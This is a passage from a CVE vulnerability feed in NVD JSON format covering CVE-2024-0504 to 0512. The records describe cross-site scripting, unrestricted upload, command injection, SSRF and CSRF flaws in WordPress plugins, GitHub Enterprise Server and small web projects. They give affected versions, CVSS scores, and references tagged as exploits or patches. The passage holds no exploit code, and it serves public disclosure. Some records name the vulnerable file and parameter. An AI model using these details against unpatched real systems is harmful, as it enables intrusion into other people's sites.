"ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1n9Zas-iSOfKVMN3UzPyVGgQgCmig2A5I/view?usp=sharing", "name" : "https://drive.google.com/file/d/1n9Zas-iSOfKVMN3UzPyVGgQgCmig2A5I/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1n9Zas-iSOfKVMN3UzPyVGgQgCmig2A5I/view?usp=sharing", "name" : "https://drive.google.com/file/d/1n9Zas-iSOfKVMN3UzPyVGgQgCmig2A5I/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250611", "name" : "https://vuldb.com/?ctiid.250611", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250611", "name" : "https://vuldb.com/?ctiid.250611", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250611", "name" : "https://vuldb.com/?id.250611", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250611", "name" : "https://vuldb.com/?id.250611", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Online FIR System 1.0. It has been classified as problematic. This affects an unknown part of the file registercomplaint.php. The manipulation of the argument Name/Address leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250611." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:sherlock:online_fir_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-13T21:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0504", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1BIa4jfZ9FbW9d7O3tRdAKF3tb6b5NUB6/view?usp=sharing", "name" : "https://drive.google.com/file/d/1BIa4jfZ9FbW9d7O3tRdAKF3tb6b5NUB6/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1BIa4jfZ9FbW9d7O3tRdAKF3tb6b5NUB6/view?usp=sharing", "name" : "https://drive.google.com/file/d/1BIa4jfZ9FbW9d7O3tRdAKF3tb6b5NUB6/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250618", "name" : "https://vuldb.com/?ctiid.250618", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250618", "name" : "https://vuldb.com/?ctiid.250618", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250618", "name" : "https://vuldb.com/?id.250618", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250618", "name" : "https://vuldb.com/?id.250618", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in code-projects Simple Online Hotel Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file add_reserve.php of the component Make a Reservation Page. The manipulation of the argument Firstname/Lastname with the input leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250618 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabianros:simple_online_hotel_reservation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-13T21:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0505", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-434" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/biantaibao/Austin-CMS-report/blob/main/File%20Upload%20Vulnerabilities.md", "name" : "https://github.com/biantaibao/Austin-CMS-report/blob/main/File%20Upload%20Vulnerabilities.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/biantaibao/Austin-CMS-report/blob/main/File%20Upload%20Vulnerabilities.md", "name" : "https://github.com/biantaibao/Austin-CMS-report/blob/main/File%20Upload%20Vulnerabilities.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250619", "name" : "https://vuldb.com/?ctiid.250619", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250619", "name" : "https://vuldb.com/?ctiid.250619", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250619", "name" : "https://vuldb.com/?id.250619", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250619", "name" : "https://vuldb.com/?id.250619", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in ZhongFuCheng3y Austin 1.0 and classified as critical. This issue affects the function getFile of the file com/java3y/austin/web/controller/MaterialController.java of the component Upload Material Menu. The manipulation leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250619." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zhongfucheng3y:austin:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T22:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0506", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/groups/image-size.php#L119", "name" : "https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/groups/image-size.php#L119", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/groups/image-size.php#L119", "name" : "https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/groups/image-size.php#L119", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/media.php#L381", "name" : "https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/media.php#L381", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/media.php#L381", "name" : "https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/media.php#L381", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3024999/elementor/trunk/includes/controls/groups/image-size.php", "name" : "https://plugins.trac.wordpress.org/changeset/3024999/elementor/trunk/includes/controls/groups/image-size.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3024999/elementor/trunk/includes/controls/groups/image-size.php", "name" : "https://plugins.trac.wordpress.org/changeset/3024999/elementor/trunk/includes/controls/groups/image-size.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4473d3f6-e324-40f5-b92b-167f76b17332?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4473d3f6-e324-40f5-b92b-167f76b17332?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4473d3f6-e324-40f5-b92b-167f76b17332?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4473d3f6-e324-40f5-b92b-167f76b17332?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $instance[alt] parameter in the get_image_alt function in all versions up to, and including, 3.18.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:elementor:website_builder:*:*:*:*:free:wordpress:*:*", "versionEndExcluding" : "3.19.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-01-27T17:38Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0507", "ASSIGNER" : "product-cna@github.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-77" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5", "name" : "https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5", "name" : "https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3", "name" : "https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3", "name" : "https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13", "name" : "https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13", "name" : "https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8", "name" : "https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8", "name" : "https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8", "refsource" : "", "tags" : [ "Release Notes" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An attacker with access to a Management Console user account with the editor role could escalate privileges through a command injection vulnerability in the Management Console. This vulnerability affected all versions of GitHub Enterprise Server and was fixed in versions 3.11.3, 3.10.5, 3.9.8, and 3.8.13 This vulnerability was reported via the GitHub Bug Bounty program." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.11.0", "versionEndExcluding" : "3.11.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.10.0", "versionEndExcluding" : "3.10.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.9.0", "versionEndExcluding" : "3.9.8", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionEndExcluding" : "3.8.13", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0508", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1010", "name" : "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1010", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1010", "name" : "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1010", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1019", "name" : "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1019", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1019", "name" : "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1019", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3021959/", "name" : "https://plugins.trac.wordpress.org/changeset/3021959/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3021959/", "name" : "https://plugins.trac.wordpress.org/changeset/3021959/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.vicarius.io/vsociety/posts/critical-vulnerability-in-wordpress-orbit-fox-plugin", "name" : "https://www.vicarius.io/vsociety/posts/critical-vulnerability-in-wordpress-orbit-fox-plugin", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ecc5a17e-c716-48bd-9b4d-49d870ae6bf3?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ecc5a17e-c716-48bd-9b4d-49d870ae6bf3?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ecc5a17e-c716-48bd-9b4d-49d870ae6bf3?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ecc5a17e-c716-48bd-9b4d-49d870ae6bf3?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Table Elementor Widget in all versions up to, and including, 2.10.27 due to insufficient input sanitization and output escaping on the user supplied link URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:themeisle:orbit_fox:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.10.27", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0509", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3031134/wp-404-auto-redirect-to-similar-post/trunk/includes/ajax.php", "name" : "https://plugins.trac.wordpress.org/changeset/3031134/wp-404-auto-redirect-to-similar-post/trunk/includes/ajax.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3031134/wp-404-auto-redirect-to-similar-post/trunk/includes/ajax.php", "name" : "https://plugins.trac.wordpress.org/changeset/3031134/wp-404-auto-redirect-to-similar-post/trunk/includes/ajax.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6eef5549-3f89-4d6f-8c4e-6e4ee6082042?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6eef5549-3f89-4d6f-8c4e-6e4ee6082042?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6eef5549-3f89-4d6f-8c4e-6e4ee6082042?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6eef5549-3f89-4d6f-8c4e-6e4ee6082042?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP 404 Auto Redirect to Similar Post plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘request’ parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hwk:wp_404_auto_redirect_to_similar_post:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.0.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0510", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-918" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/gBtNhBb39u9u", "name" : "https://note.zhaoj.in/share/gBtNhBb39u9u", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/gBtNhBb39u9u", "name" : "https://note.zhaoj.in/share/gBtNhBb39u9u", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250652", "name" : "https://vuldb.com/?ctiid.250652", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250652", "name" : "https://vuldb.com/?ctiid.250652", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250652", "name" : "https://vuldb.com/?id.250652", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250652", "name" : "https://vuldb.com/?id.250652", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in HaoKeKeJi YiQiNiu up to 3.1. Affected by this issue is the function http_post of the file /application/pay/controller/Api.php. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250652." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:haokekeji:yiqiniu:*:*:*:*:*:*:*:*", "versionEndIncluding" : "3.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T22:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0511", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8bef03-51e0-4448-bddd-85300104e875?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8bef03-51e0-4448-bddd-85300104e875?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8bef03-51e0-4448-bddd-85300104e875?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8bef03-51e0-4448-bddd-85300104e875?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the wpr_update_form_action_meta function. This makes it possible for unauthenticated attackers to post metadata via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.3.88", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-08T06:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0512", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", 